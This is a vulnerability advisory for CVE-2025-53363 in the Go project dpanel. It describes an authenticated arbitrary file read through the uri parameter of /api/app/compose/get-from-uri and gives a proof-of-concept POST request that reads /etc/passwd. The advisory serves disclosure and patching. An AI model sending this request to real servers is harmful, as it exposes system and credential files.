CVE-2025-53363 – github.com/donknap/dpanel

Package

Manager: go
Name: github.com/donknap/dpanel
Vulnerable Version: >=1.2.0 <=1.7.2

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:P

EPSS: 0.00058 pctl0.18341

Details

Dpanel has an arbitrary file read vulnerability ### Summary Dpanel has an arbitrary file read vulnerability in the /api/app/compose/get-from-uri interface.Logged in to Dpanel ,this interface can be used to read arbitrary files. ### Details When a user logs into the administrative backend, this interface can read any files on the host/sever (given the necessary permissions), which may lead to system information leakage. The vulnerability lies in the GetFromUri function within the app/application/http/controller/compose.go file. The uri parameter submitted by the user in JSON format can be directly read and returned by os.ReadFile without proper security handling.   ### PoC ```text POST /api/app/compose/get-from-uri HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Authorization: Bearer eyJ......lWg== Connection: close Content-Type: application/json Content-Length: 21 {"uri":"/etc/passwd"} ``` ### Impact This vulnerability could lead to the leakage of sensitive server file information. In versions from 1.2.0 up to the latest (1.7.2), logged-in users can make requests to this interface.

Metadata

Created: 2025-08-22T16:49:05Z
Modified: 2025-08-29T20:34:31Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gcqf-pxgg-gw8q/GHSA-gcqf-pxgg-gw8q.json
CWE IDs: ["CWE-22", "CWE-73"]
Alternative ID: GHSA-gcqf-pxgg-gw8q
Finding: F063
Auto approve: 1